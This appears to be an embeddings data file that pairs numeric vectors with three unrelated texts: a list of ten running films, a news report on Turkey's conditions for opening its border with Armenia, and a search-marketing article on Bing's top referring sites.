0.01691267266869545, 0.14567235112190247, 0.11914259195327759, 0.06652963906526566, -0.005700225010514259, 0.037215687334537506, -0.07702646404504776, 0.0457322858273983, -0.020400308072566986, -0.05983851104974747, 0.05752083286643028, -0.010909865610301495, -0.02665022388100624, -0.006962002255022526, 0.03633007034659386, 0.005201207008212805, 0.04222053289413452, 0.04744430631399155, -0.0019510298734530807, -0.013229811564087868, -0.07748297601938248, -0.03718636557459831, 0.010458061471581459, -0.0357447974383831, 0.06308946758508682, -0.030290130525827408, 0.08160768449306488, -0.05838910862803459, 0.06544355303049088, 0.000009603292710380629, -0.0124878641217947, -0.015301129780709743, -0.15700663626194, -0.02927744947373867, 0.005659003276377916, -0.056648965924978256, -0.028626302257180214, 0.039435263723134995, -0.01216889824718237, -0.11480183899402618, 0.1443042755126953, -0.026541389524936676, 0.024456067010760307, -0.0018877640832215548, 0.05284295231103897, 0.019775599241256714, -0.055828820914030075, 0.008116023615002632, -0.033766623586416245, -0.047855157405138016, 0.05970796197652817, -0.006902155466377735, 0.04864179715514183, -0.04194982722401619, 9.101263174531638e-34, 0.0565878301858902, 0.032921358942985535, 0.023724978789687157, -0.048695679754018784, 0.008830555714666843, -0.05477245897054672, 0.056356124579906464, 0.009837903082370758, -0.07841962575912476, -0.10719892382621765, -0.11642228811979294, 0.09346866607666016, 0.030007200315594673, -0.10557086020708084, 0.038047291338443756, 0.037835743278265, -0.04825986921787262, -0.04048542305827141, -0.08496743440628052, 0.08372671902179718, 0.17269361019134521, 0.02087581530213356, 0.0030398699454963207, 0.007476501166820526, -0.1556495875120163, -0.051260873675346375, -0.012579534202814102, -0.06312785297632217, 0.008599765598773956, 0.034315239638090134, -0.09401024878025055, -0.06794997304677963, -0.008380495011806488, 0.05406962335109711, 0.011201203800737858, 0.033033035695552826, -0.07946820557117462, -0.06259408593177795, -0.02377050369977951, -0.03899930790066719, -0.050482556223869324, 0.016543284058570862, -0.009468789212405682, 0.019421130418777466, -0.04552174732089043, 0.002034509787335992, -0.033240482211112976, 0.024596216157078743, 0.024136729538440704, -0.05260758101940155, 0.023760050535202026, 0.0008657614234834909, -0.0017497878288850188, 0.0005403975956141949, 0.08080106973648071, 0.04231851547956467, 0.06130252778530121, 0.018038732931017876, 0.0318375900387764, 0.0545131154358387, 0.004814016632735729, -0.023592254146933556, -0.0019906663801521063, 0.057949282228946686, 0.005767286289483309, -0.039915528148412704, 0.03698902949690819, 0.0011136714601889253, -0.015994245186448097, -0.07059536874294281, 0.01084426324814558, 0.004477891605347395, 0.0037231913302093744, 0.11817456781864166, -0.025546809658408165, -0.01612985134124756, 0.06177236884832382, 0.048557348549366, -0.02402770332992077, -0.021946938708424568, -0.01817861758172512, -0.026206254959106445, 0.022250227630138397, -0.025895223021507263, -0.06323479115962982, -0.0716252326965332, 0.04968329891562462, -0.04082660749554634, -0.019046150147914886, -0.0010699296835809946, 0.016376351937651634, 0.011994014494121075, -0.03762110322713852, -0.04304032400250435, -0.05554956942796707, -1.9354580607846198e-33, 0.05678798630833626, -0.04740593209862709, 0.029678598046302795, -0.04719618707895279, 0.03844897449016571, 0.022230638191103935, 0.07381084561347961, 0.09740031510591507, 0.05466850847005844, -0.012445254251360893, 0.13492080569267273, -0.021285824477672577, 0.01960371620953083, 0.05388226360082626, 0.006022823508828878, -0.016012905165553093, 0.02148052491247654, 0.05136676877737045, -0.019045144319534302, -0.03852982074022293, 0.012399435974657536, -0.03945117071270943, -0.07338622957468033, 0.04588336497545242, 0.0009892667876556516, 0.019152386114001274, 0.017893929034471512, 0.06808493286371231, -0.14358791708946228, 0.07996644824743271, 0.04371291771531105, -0.014018523506820202, -0.004873659927397966, -0.03340738266706467, 0.06046969071030617, 0.03895097225904465, -0.060755614191293716, 0.08441289514303207, 0.028306949883699417, 0.09124253690242767, 0.008754458278417587, -0.03322134166955948, -0.013689201325178146, 0.0776313841342926, 0.005192504730075598, 0.0027294126339256763, -0.005808909423649311, 0.07265672832727432, -0.0096147321164608, 0.005165353883057833, 0.013418982736766338, 0.06818154454231262, -0.11123902350664139, 0.09606895595788956, -0.04402352124452591, 0.02031698450446129, 0.0037608405109494925, 0.02864946611225605, 0.005020256154239178, -0.06204497814178467, -0.05630718916654587, -0.011759732849895954, 0.0011903407284989953, -0.02199033834040165, -0.04208676144480705, 0.0012102636974304914, -0.03011384792625904, -0.07961874455213547, -0.11352667212486267, 0.011814452707767487, -0.03524616360664368, -0.016842341050505638, -0.03155907243490219, -0.023556632921099663, -0.03992573544383049, 0.0018464898457750678, -0.05657748132944107, 0.007468429394066334, -0.008018543012440205, 0.040092919021844864, -0.06703115999698639, 0.04066956415772438, -0.056841954588890076, 0.06808075308799744, 0.08140317350625992, 0.039446089416742325, 0.03962250053882599, 0.05024045333266258, 0.00499992398545146, -0.03099077381193638, -0.01950710639357567, -0.026516390964388847, -0.04548400640487671, 0.0028589433059096336, 0.018045345321297646, -5.230914368326012e-8, -0.05905737355351448, 0.11488869041204453, -0.01900327578186989, 0.018780304118990898, 0.04087376967072487, 0.03550523519515991, 0.023334378376603127, -0.08342742919921875, 0.020011108368635178, 0.039160728454589844, 0.03071705624461174, -0.04896903783082962, 0.00713887345045805, -0.1056339293718338, -0.01076132245361805, 0.0805160403251648, -0.013166041113436222, 0.07466781884431839, -0.004301602952182293, 0.04423191398382187, -0.03054528310894966, -0.03993801772594452, 0.01630864292383194, 0.023835675790905952, 0.0429820753633976, -0.026368271559476852, -0.035808343440294266, 0.008955489844083786, 0.003277408191934228, -0.056911569088697433, 0.04153040423989296, 0.034010205417871475, 0.05024866759777069, -0.007444882299751043, -0.05390981212258339, 0.06216044723987579, -0.025360213592648506, -0.023828621953725815, -0.01725112646818161, 0.08256255090236664, 0.0012931491946801543, -0.0016161897219717503, -0.07837032526731491, 0.024339638650417328, 0.047041717916727066, -0.03163793683052063, 0.017137931659817696, -0.037359222769737244, -0.051627613604068756, 0.02096564695239067, 0.018691809847950935, -0.020756881684064865, 0.00846581906080246, 0.05008426681160927, 0.029578693211078644, 0.012014297768473625, -0.07987034320831299, -0.001986586255952716, -0.059214480221271515, 0.075381800532341, -0.02014719322323799, -0.10666369646787643, 0.0811639130115509, 0.061975982040166855 ]
From Marathon Man to Forrest Gump, we complete a circuit of the best running-themed films. What's your favourite? Let us know below Since the moment Eadweard Muybridge captured a man sprinting in 1887 runners have worn a path across the cinematic landscape. Whether on the pristine oval of an Olympic running track, a dusty patch in a prison rec yard or the damp tarmac of a rural country road, film has documented the sweat and solitude of running in all its pain and glory. Here are 10 of the best. Reading this on mobile? Click here to view the video Opening with the sound of Tom Courtenay's feet thudding against a bleak rural lane, Tony Richardson and Alan Sillitoe's 1962 British New Wave classic is one of the most poetic running films in cinematic history. As Colin Smith, a petty delinquent, Courtenay gives a compelling perfomance in this class-conscious commentary on late-50s British society. After being sent to a reformatory for his part in a bakery robbery, Smith turns to long-distance running to escape the drudgery of his confinement. His talent is spotted by the governor who offers the promise of early release if he runs for the reformatory in a race against a public school. In the final, stunning denouement, Smith's freedom and independence are resolved by his race performance in the most unpredictable way. Marathon Man Reading this on mobile? Click here to view the video "Is it safe?" Probably not when you have a Nazi war criminal drilling holes in your teeth. Dustin Hoffman plays Columbia grad student and running obsessive Thomas "Babe" Levy, who is hounded by Laurence Olivier's sinister Dr Christian Szell over a briefcase of missing diamonds. An early scene shows Hoffmann pushing himself around Central Park. All that training and his ability to recall the feats of Ethiopian Olympic legend Abebe Bikila winning in Rome and Tokyo give him the endurance to escape his tormentors. Director John Schlesinger intercuts footage of a petrified, bloody Hoffman with the placid Bikila from the Tokyo Olympiad official film to striking effect. Forrest Gump Reading this on mobile? Click here to view the video After childhood sweetheart Jenny Curran (Robin Wright) leaves Tom Hanks's sweet Forrest Gump halfway through Robert Zemeckis's Oscar-laden drama, he sets off on an epic run lasting three years, two months, 14 days, and 16 hours. More than your average Sunday morning wheeze-fest. Forrest finally stops running when, after covering 15,248 miles, he has managed to "put his past behind him". The sequence manages to be beautiful and amusing in its exploration of the catharsis of running. Anyone who fancies emulating Forrest can do so with the help of the fastidious people at the Centives economics blog who have created the ultimate MapMyRun style analysis of Forrest's running route. The Robber Reading this on mobile? Click here to view the video German director Benjamin Heisenberg's film is based on real-life 80s Austrian bank-robber and gifted marathon runner Johnann Kastenberger. Adapted from the novel by Martin Prinz, the quiet yet kinetic and visually elegant film mixes the robber's getaways with races from his earlier life as a potential marathon runner. Adrenaline and ecstasy at their best and worst are shown in this examination of a man who "only feels truly alive, truly himself, truly free when he is running". Or stealing loads of cash from a Viennese bank. Reading this on mobile? Click here to view the video These two biopics of maverick American 5000m runner Steve Prefontaine were released a year apart and there is little to separate the two. Chinatown screenwriter Robert Towne's Without Limits perhaps has the edge thanks to a glossier production, but Steve "Hoop Dreams" James's film also has its merits. Both deal with Pre's bolshy frontrunning tactics, spectacular 1972 Munich Olympic disappointment and tragic, fatal car crash at 24. As a sideline, in Without Limits you can also witness the birth of Nike through Donald Sutherland's portrayal of Bill Bowerman, Pre's Oregon running coach and co-founder of the sportswear giant. Run Fatboy Run Reading this on mobile? Click here to view the video In perhaps the funniest take on the pain of long-distance running, David Schwimmer casts boyish British Everyman Simon Pegg as an affable loser who decides to run a marathon in an attempt to prove his worth to his ex-fiancee Thandie Newton. Some of the biggest laughs come from the familiar pitfalls of the amateur marathoner – blisters and hitting the wall. On the Edge Reading this on mobile? Click here to view the video Showcasing some exemplary sports-movie dialogue – "I'm going to take your bloated carcass and teach you how to be a mountain racer!" – this tale of running redemption casts Bruce Dern as an unfairly disgraced athlete attempting to reclaim the glory he was denied. At the ripe age of 44 he enters a fictional version of the Dipsea Race in Marin County, a gruelling seven-mile slog over hazardous mountain terrain. The sequences of the sinewy Dern, a real life ultramarathon runner, padding along the glorious California coastline are a joy to behold. The Jericho Mile Reading this on mobile? Click here to view the video An early breakthrough for Michael Mann, this Emmy-winning made-for-TV movie features Peter Strauss as Larry "Rain" Murphy, a loner sent to prison for murdering his abusive father. After the warden discovers his talent for running, he is given a chance to train for the Olympic trials. Multiple running scenes mixed with a real-life prison backdrop create an upbeat sports drama worthy of the accolades it received. The Athlete Reading this on mobile? Click here to view the video As well as inspiring Dustin Hoffman's getaway in the aforementioned Marathon Man, Abebe Bikila has his own movie. Blending biopic, autobiography drama and documentary to create a portrait of the first African to win an Olympic gold medal, the film features stunning canters through the Abyssinian plateau. Juxtaposing those Olympic triumphs with the heartwrenching loss of Bikila's legs in a late-career car accident adds power too. Reading this on mobile? Click here to view the video You didn't think we'd forget did you? Despite the best efforts of Mr Bean, this British classic is still one of the most exciting running films ever made. Charting the lives of British Olympians Eric Liddell and Harold Abrahams in the lead up to their triumph at the 1924 Paris Olympics, Chariots of Fire is the go-to post-run recovery movie. Vangelis and excessive slow motion. What more could you want? And if that movie marathon doesn't tire you out you can put in some extra miles alongside younger incarnations of Michael Douglas in Running and Brad Pitt in Across the Tracks Which running films – or films with a great running scene – have we missed? Share your favourites and take outraged issue with this selection below ... This article contains affiliate links, which means we may earn a small commission if a reader clicks through and makes a purchase. All our journalism is independent and is in no way influenced by any advertiser or commercial initiative. The links are powered by Skimlinks. By clicking on an affiliate link, you accept that Skimlinks cookies will be set. More information.
[ -0.03636828437447548, -0.008274233900010586, -0.02560202032327652, -0.01711084507405758, -0.0129880765452981, 0.06335774064064026, -0.02226061373949051, -0.04443161562085152, -0.04797949641942978, -0.011373337358236313, -0.11743338406085968, 0.06487874686717987, -0.020274823531508446, 0.042486000806093216, 0.020261533558368683, 0.04345117509365082, 0.019031358882784843, 0.011238071136176586, 0.023339534178376198, 0.09296867251396179, 0.04219196364283562, -0.031111765652894974, 0.014093881472945213, -0.031531088054180145, -0.08177299052476883, -0.0318019762635231, 0.039686065167188644, 0.01755613088607788, -0.05975775048136711, 0.061126790940761566, -0.003026834689080715, -0.0510648749768734, 0.015026888810098171, -0.032839469611644745, 0.02376101352274418, 0.03735208883881569, 0.038809288293123245, 0.00864094216376543, -0.09433309733867645, 0.05605170875787735, -0.02342986688017845, -0.04580879956483841, -0.052829209715127945, 0.08394734561443329, 0.052172351628541946, -0.025569239631295204, -0.003966306336224079, -0.056198492646217346, -0.027717923745512962, -0.020213767886161804, -0.04018319770693779, 0.010314997285604477, 0.0033100757282227278, -0.052821025252342224, 0.0000742294650990516, -0.03619018569588661, -0.02501281537115574, 0.028470031917095184, 0.004012793302536011, -0.05357259884476662, -0.026551222428679466, -0.05740264803171158, 0.021047107875347137, -0.013806255534291267, 0.04680206999182701, -0.0439310297369957, -0.054751232266426086, 0.09482994675636292, 0.045810945332050323, 0.03421349450945854, -0.07912519574165344, 0.005618709605187178, -0.016632724553346634, -0.03199206665158272, -0.10566765069961548, -0.05439235270023346, -0.0832238718867302, -0.03450407087802887, -0.11506044864654541, -0.0674033984541893, 0.07484212517738342, -0.101419597864151, -0.07960720360279083, 0.011971886269748211, 0.04590741917490959, 0.03355998918414116, 0.06362708657979965, -0.03652035817503929, -0.04099768400192261, -0.013210220262408257, -0.028608346357941628, -0.007523227017372847, -0.05000125989317894, 0.04008672758936882, 0.056278046220541, -0.0281106848269701, -0.0486113503575325, 0.03161432221531868, 0.02649686299264431, 0.04267575219273567, 0.0694640725851059, -0.05642927065491676, 0.008591086603701115, 0.062342748045921326, 0.09473569691181183, -0.06945285946130753, -0.01591937243938446, 0.0717134028673172, 0.022253863513469696, -0.06939181685447693, 0.0729689970612526, 0.03365948051214218, 0.02219119668006897, 0.07106107473373413, 0.07834748923778534, -0.06935369223356247, -0.08865145593881607, 0.02927926555275917, -0.0013135980116203427, 0.1754675954580307, 0.03116661123931408, 0.025149013847112656, -0.06791418045759201, -0.021077647805213928, -0.014305505901575089, -0.015061354264616966, 0.08936882764101028, 4.525007096114839e-33, -0.006212972570210695, -0.014748139306902885, 0.06371141225099564, -0.0028892382979393005, 0.0493592731654644, 0.007670099381357431, -0.04599631577730179, -0.0016534035094082355, -0.011273383162915707, 0.023463359102606773, -0.004952556919306517, -0.029823938384652138, -0.0017439837101846933, -0.02353631518781185, 0.005404028110206127, -0.04384118318557739, -0.07896826416254044, -0.02491586096584797, 0.09495667368173599, 0.04266425967216492, -0.008050867356359959, 0.1007685735821724, -0.033353663980960846, -0.06733402609825134, -0.05117977410554886, -0.004756325390189886, 0.021447520703077316, -0.04451336711645126, 0.04450935870409012, 0.029204748570919037, -0.032741978764534, -0.003378325141966343, -0.04971242696046829, -0.012033447623252869, 0.01702863909304142, -0.05769157409667969, -0.058410923928022385, -0.01782575249671936, 0.01878490298986435, 0.03634357824921608, -0.0676548182964325, -0.02475639060139656, 0.0281366016715765, -0.0014706093352288008, -0.09063959121704102, 0.04852457717061043, 0.01791379041969776, 0.1054781973361969, -0.037111736834049225, 0.03815864399075508, 0.014102699235081673, 0.01842357963323593, 0.012671449221670628, -0.057019107043743134, -0.02594565600156784, -0.028180425986647606, 0.03739939257502556, -0.0341540090739727, -0.03524765372276306, -0.007920404896140099, 0.03442360833287239, 0.013445447199046612, 0.004794267937541008, -0.048499420285224915, -0.08351500332355499, -0.010568941943347454, -0.03387176990509033, -0.0661081075668335, -0.059947602450847626, -0.0259593203663826, -0.060734301805496216, 0.015924986451864243, -0.025398390367627144, 0.014533039182424545, 0.07394134998321533, -0.010460424236953259, 0.07188846170902252, 0.13716833293437958, -0.11601031571626663, -0.04782427102327347, -0.01856008730828762, -0.06638112664222717, 0.007051932159811258, -0.009704197756946087, -0.022449737414717674, 0.03745216876268387, 0.022108938544988632, -0.1394980549812317, -0.013422533869743347, 0.032929807901382446, 0.0022811770904809237, -0.03916318714618683, -0.05995694547891617, 0.043374139815568924, -0.0019346411572769284, -5.782691277262652e-33, 0.06602819263935089, -0.0177493654191494, 0.043610621243715286, 0.03631087392568588, 0.10956405103206635, 0.05116237327456474, 0.0254199281334877, -0.03474895656108856, 0.005099516361951828, -0.03230665624141693, -0.0317581482231617, -0.0015503569738939404, 0.061834197491407394, 0.07626335322856903, -0.058094948530197144, -0.03204319626092911, 0.03387250378727913, 0.017366178333759308, -0.013742867857217789, 0.03529885783791542, 0.08698908239603043, -0.019884018227458, 0.0380130372941494, -0.106114961206913, 0.007705892901867628, 0.06360607594251633, 0.049367327243089676, -0.052483513951301575, -0.03356641158461571, -0.04246462881565094, 0.01848924346268177, 0.01645677722990513, -0.07506005465984344, -0.09100132435560226, -0.11421556770801544, 0.05720296502113342, 0.03680115193128586, -0.04569990932941437, -0.03878837078809738, 0.0601775124669075, 0.05322292447090149, 0.03862978145480156, 0.05837849900126457, 0.043302200734615326, -0.008539177477359772, 0.00634422292932868, -0.07980421185493469, 0.005279443692415953, -0.11714152991771698, 0.024052109569311142, -0.02365802228450775, 0.06968360394239426, -0.02317478507757187, 0.05095828324556351, 0.017634984105825424, -0.09157548099756241, 0.021263577044010162, -0.05911807343363762, -0.09828438609838486, 0.06048610061407089, -0.07666800171136856, 0.05035148561000824, -0.0712043046951294, -0.027087531983852386, 0.02075153775513172, 0.03767629340291023, -0.05082352086901665, 0.016676995903253555, -0.05949941277503967, -0.032977260649204254, -0.11350469291210175, -0.06961660832166672, -0.04731070622801781, -0.016312412917613983, -0.02487068623304367, 0.06508082896471024, -0.03734569251537323, -0.050063155591487885, -0.06544540822505951, 0.021559247747063637, -0.003653928404673934, -0.0694596990942955, 0.05851588398218155, 0.016467085108160973, -0.04432398080825806, 0.12458408623933792, 0.06722698360681534, -0.032291311770677567, -0.03843246027827263, 0.06426939368247986, 0.11078481376171112, 0.07464414089918137, 0.001481270301155746, 0.07588016241788864, 0.02845330536365509, -6.084459869271086e-8, -0.11121144145727158, 0.06891012191772461, 0.00574762187898159, -0.06871407479047775, 0.06369658559560776, 0.04223767668008804, 0.00031106278765946627, 0.034641899168491364, 0.0002613044925965369, 0.02756018191576004, -0.01667456142604351, -0.009664271958172321, 0.02720228210091591, 0.07894323766231537, -0.03778025507926941, 0.03579670935869217, 0.01931157521903515, -0.08834260702133179, -0.04100196808576584, 0.03488503769040108, -0.00602252222597599, 0.02885778434574604, 0.038144148886203766, 0.05217549204826355, 0.011049149557948112, 0.006530099548399448, -0.027672316879034042, -0.06896892935037613, 0.05968855321407318, 0.049561113119125366, -0.05194123461842537, 0.090437151491642, -0.008605710230767727, -0.03067777119576931, -0.03290066495537758, 0.05312640964984894, 0.0022233680356293917, 0.07747095078229904, -0.0071277194656431675, -0.020259806886315346, -0.014397500082850456, -0.0013509847922250628, 0.013031378388404846, 0.021844161674380302, 0.08005685359239578, -0.03903910890221596, 0.008882922120392323, 0.01751610077917576, -0.023547599092125893, 0.029906775802373886, 0.05678797513246536, -0.007401920855045319, 0.008332663215696812, 0.05283766984939575, 0.10567568242549896, 0.07126383483409882, -0.09085304290056229, 0.01319416705518961, -0.048901449888944626, 0.0644262284040451, -0.007968363352119923, -0.030595878139138222, 0.009798936545848846, 0.02953873574733734 ]
YEREVAN (Arka)—Turkish Prime Minister Ahmet Davutoglu said his government would open the sealed border with Armenia on condition that Armenia returns at least one of several regions surrounding Nagorno-Karabakh to Azerbaijan, Novosti-Armenia reported citing RIA Novosti. “If Armenians withdrew from at least one district, the border could be opened,” Davutoglu said at a meeting with the leaders of non-Muslim and non-governmental organizations in Ankara, according to Haber Turk TV. The statement is a first, considering that Turkey’s preconditions for normalizing relations with Armenia have, up to this point, demanded that Armenia relinquish all seven regions surrounding Artsakh. He added that Armenians living in Turkey are part of the country and should not suffer because of the strained relations between Ankara and Yerevan. “The Armenian Diaspora is not an enemy to us, it is our Diaspora,” he said. Turkey and Armenia have no diplomatic relations. Turkey closed its border with Armenia in 1993 in a show of support for its co-ethnic ally, Azerbaijan, when war broke out over Nagorno-Karabakh. There are several issues complicating the establishment of normal relations between the two countries, particularly, Ankara’s blatant support for Azerbaijan in the Nagorno-Karabakh conflict resolution process and Turkey’s refusal to acknowledge the mass slaughter of Armenians in the last years of the Ottoman Empire as genocide.
[ 0.004927202593535185, 0.04903347045183182, -0.01594155840575695, 0.012840159237384796, -0.04970034211874008, -0.033502042293548584, 0.07058683782815933, -0.05501260608434677, 0.037830449640750885, -0.025844188407063484, -0.10402431339025497, 0.01329879742115736, -0.12867824733257294, 0.010632073506712914, 0.056050218641757965, 0.01856410503387451, 0.008885081857442856, 0.007421345915645361, -0.10176290571689606, -0.05229174718260765, -0.020170055329799652, -0.058011531829833984, 0.005868537351489067, -0.07689276337623596, 0.048447903245687485, -0.006137708202004433, 0.013702485710382462, -0.030720137059688568, 0.016608715057373047, 0.04434974119067192, 0.008263173513114452, -0.020615635439753532, -0.11614050716161728, 0.06989844143390656, 0.03341485187411308, 0.06325816363096237, -0.0463123619556427, -0.02950884774327278, 0.034759171307086945, -0.006582027301192284, 0.101023830473423, 0.011274986900389194, -0.0484166294336319, -0.012394756078720093, 0.0075236111879348755, 0.035181283950805664, -0.025496693328022957, -0.005519094876945019, -0.023964058607816696, -0.017148332670331, -0.007818086072802544, -0.0015012698713690042, -0.013908895663917065, -0.04484255611896515, 0.06469365954399109, 0.056360721588134766, -0.019258197396993637, -0.02859404869377613, -0.07570045441389084, 0.039866890758275986, 0.011916817165911198, 0.0191594660282135, 0.0013612561160698533, -0.03443894535303116, -0.054350849241018295, -0.02728276699781418, 0.04472505673766136, 0.018317922949790955, 0.06337828934192657, -0.011302953585982323, 0.05286819860339165, 0.019510148093104362, -0.13772188127040863, -0.04244073107838631, -0.010096228681504726, -0.1405511498451233, 0.045605212450027466, 0.07945375889539719, 0.01909714750945568, -0.028005974367260933, 0.08959174156188965, 0.06795544922351837, 0.06035427376627922, -0.04129460081458092, -0.02048150636255741, -0.01322874054312706, 0.04971569776535034, -0.04253209009766579, 0.04113074392080307, -0.017804892733693123, 0.09384460002183914, 0.01362609677016735, 0.10509322583675385, -0.03092576377093792, 0.17544271051883698, -0.0650685727596283, 0.10700935870409012, -0.03094491921365261, -0.012097728438675404, 0.09973099827766418, 0.015207897871732712, 0.005383848212659359, -0.06345207244157791, -0.013230797834694386, -0.05951878800988197, 0.03786906599998474, -0.027267593890428543, -0.05196082219481468, -0.07736657559871674, 0.06994620710611343, -0.0012310013407841325, -0.09562017023563385, 0.0606718473136425, 0.005332332570105791, 0.04068012163043022, 0.008586149662733078, -0.03444374352693558, -0.00015875519602559507, 0.07707101851701736, 0.09351541846990585, -0.05051523074507713, -0.051800258457660675, 0.00868197251111269, 0.14256218075752258, 0.014733180403709412, 0.006466492544859648, -0.024135112762451172, 2.3726301036561903e-33, 0.015951355919241905, -0.03476579487323761, 0.02205653116106987, -0.025302443653345108, -0.04938631132245064, 0.02017934061586857, -0.05644543096423149, 0.00045461702393367887, -0.0009691126178950071, 0.03370014578104019, -0.0070092338137328625, -0.05637724697589874, -0.03404426947236061, -0.016434956341981888, 0.026921860873699188, 0.07257818430662155, 0.014067649841308594, 0.0456228032708168, -0.025724686682224274, 0.05120651423931122, -0.058026090264320374, 0.028071654960513115, -0.026603475213050842, 0.044174227863550186, -0.03867260366678238, 0.02613931894302368, -0.05914665013551712, -0.05130094662308693, -0.004218731541186571, 0.010238384827971458, -0.04501711577177048, 0.011040633544325829, 0.010156131349503994, 0.04874354228377342, -0.1315009444952011, 0.0483834445476532, -0.0665917918086052, -0.007409815210849047, -0.05611753836274147, 0.05039834976196289, 0.0038686764892190695, 0.011798446998000145, -0.013302715495228767, -0.012678752653300762, 0.0887204110622406, -0.027830634266138077, 0.06429973244667053, -0.05371984466910362, -0.05437018349766731, -0.03520328551530838, -0.042691659182310104, 0.0872749611735344, -0.03179820254445076, -0.006399523466825485, -0.051759734749794006, -0.06297570466995239, -0.033505894243717194, 0.032883547246456146, 0.058259516954422, 0.050028324127197266, 0.014057370834052563, -0.08310113847255707, 0.008543363772332668, 0.007534712087363005, 0.070970319211483, 0.0013832416152581573, -0.03747585415840149, 0.07813525944948196, -0.02226310782134533, 0.005044104065746069, 0.014058699831366539, -0.008909943513572216, 0.005162610672414303, 0.0383942686021328, -0.10711131244897842, 0.018791640177369118, -0.010095777921378613, 0.00534385722130537, -0.022711358964443207, -0.017302123829722404, 0.011880789883434772, 0.007846304215490818, 0.046539533883333206, -0.06702864915132523, -0.08469729870557785, -0.006207364145666361, 0.024163898080587387, -0.062457069754600525, 0.021712588146328926, 0.017145657911896706, -0.07507554441690445, 0.049127332866191864, -0.01138966903090477, 0.030750742182135582, 0.0649355873465538, -4.227390293585868e-33, 0.042378079146146774, -0.04882751777768135, -0.13732530176639557, -0.029312558472156525, -0.06138116866350174, 0.037241242825984955, 0.0263637974858284, 0.05889594182372093, -0.008770096115767956, 0.08554986119270325, 0.037883955985307693, -0.05084170773625374, 0.07774478197097778, 0.0549398697912693, -0.06521327793598175, 0.0026536439545452595, 0.054299235343933105, 0.0977381095290184, 0.006944982334971428, 0.046507734805345535, -0.024747643619775772, -0.033852558583021164, -0.044878240674734116, 0.04760545864701271, 0.011016268283128738, -0.0048887599259614944, -0.06527715176343918, -0.12837468087673187, -0.05057686194777489, -0.018517805263400078, 0.06121459975838661, -0.08437596261501312, -0.05583489313721657, 0.06402285397052765, 0.01580408588051796, 0.02835812419652939, 0.02447281964123249, -0.02847563847899437, -0.06207185238599777, 0.07052814215421677, 0.046931006014347076, -0.004211920313537121, 0.05040118098258972, 0.03945843130350113, -0.06359421461820602, 0.06638292223215103, 0.009620853699743748, 0.09491469711065292, -0.03349152207374573, -0.1558566391468048, 0.002273996826261282, 0.0060081868432462215, 0.027375582605600357, -0.06822434812784195, 0.03308828920125961, 0.07686235755681992, 0.012949778698384762, 0.05605131760239601, -0.019166626036167145, 0.027179352939128876, 0.0401926189661026, 0.03542838245630264, 0.020885547623038292, -0.09900997579097748, 0.01263562310487032, -0.01695139892399311, -0.0251084566116333, 0.05797318369150162, 0.049247100949287415, -0.020508471876382828, -0.05332541465759277, -0.032392144203186035, -0.04478263854980469, 0.02530573308467865, 0.013436106964945793, 0.058340251445770264, 0.029742849990725517, -0.07547897845506668, 0.03810974210500717, -0.04421388357877731, -0.013049716129899025, -0.10076242685317993, -0.02146945893764496, -0.027929959818720818, 0.031159741804003716, 0.046054087579250336, 0.09122605621814728, -0.010211874730885029, 0.06285494565963745, 0.029336534440517426, -0.039252836257219315, -0.022309746593236923, -0.061947159469127655, 0.008163773454725742, -0.024944262579083443, -4.924681817897181e-8, 0.11537640541791916, -0.04009655490517616, -0.03822479024529457, 0.009724914096295834, -0.08327291905879974, -0.007562147919088602, 0.054467879235744476, 0.010372516699135303, -0.08610004931688309, 0.02407613769173622, -0.09304338693618774, -0.019243640825152397, -0.09564647078514099, -0.021059399470686913, 0.009400035254657269, 0.062134839594364166, 0.02759675495326519, -0.019941221922636032, 0.0021570147946476936, -0.061342719942331314, -0.05796102434396744, -0.033439669758081436, -0.014270185492932796, -0.07339111715555191, -0.029869582504034042, -0.04774455726146698, 0.056877464056015015, 0.05250101909041405, 0.0422293059527874, 0.01149376854300499, -0.04952927306294441, -0.02970157004892826, 0.008668778464198112, 0.051056910306215286, 0.016653262078762054, 0.03742094710469246, 0.015400433912873268, -0.019080374389886856, 0.028922611847519875, -0.06405405700206757, 0.005475527141243219, 0.02987964078783989, 0.0578279048204422, -0.008344690315425396, -0.049277957528829575, -0.026421276852488518, 0.11203117668628693, -0.1017724871635437, -0.009612418711185455, 0.0017783615039661527, -0.03444758057594299, 0.019228443503379822, 0.00487489765509963, 0.07410811632871628, 0.023267174139618874, 0.0018547277431935072, -0.09790640324354172, 0.01467460673302412, 0.05441493168473244, 0.029059777036309242, 0.02313791587948799, 0.00539953401312232, -0.03581567108631134, -0.02335732989013195 ]
Note: By submitting this form, you agree to Third Door Media's terms . We respect your privacy . Sign up for our daily recaps of the ever-changing search marketing landscape. What sites send Bing the most traffic? Here’s a surprise. According to Hitwise, Google is Bing’s fourth largest referring source. Below are the top five sites that drive traffic to Bing, or “upstream” to Bing, as Hitwise calls it: MSN is by far the top source, the last site visited by 42.7% of Bing users before they went to Bing. That’s not surprising. MSN — Microsoft’s portal — has long been a huge search driver for Microsoft. In fact, the company recently said that half of all Bing queries come from MSN. Bing is also the default web search engine for Facebook, so Facebook makes sense as the number two referrer, at 4.6% of traffic. Windows Live Mail — that’s another Microsoft property that ties into Bing search — so it’s another one that makes sense logically. It’s at 4.4% of traffic. But Google as the fourth largest referring source, at 4.1%? Google, which competes against Bing? How’s that happening? Probably two ways. First, Bing buys ads on Google, like this: You can find Bing ads showing up on searches at Google for bing, cashback, search engines, flight comparison and image search, to name some examples. Interestingly, Bing doesn’t appear to be buying ads against its tagline, that it is a decision engine. Bing also does a lot of TV advertising. TV ads are known to drive search queries. So there’s a good chance that when someone sees a Bing ad, they decide to google Bing and discover what they’ve just seen! All this also applies to Yahoo, which drives 1.9% of traffic. Bing advertises there, and TV ads probably generate queries on Yahoo for Bing, as well. It’s clear people do search for Bing by name on Google. Using Google Trends, we can see the growth of this over the last year. Here’s the search volume of those seeking Bing on Google: Still, that’s nothing compared to the number of searches that happen for Yahoo on Google. Here’s the Bing chart again, this time with searches for Yahoo on Google added in: Oddest of all, currently more people search on Google for Google than for Yahoo or Bing. Here’s the chart:
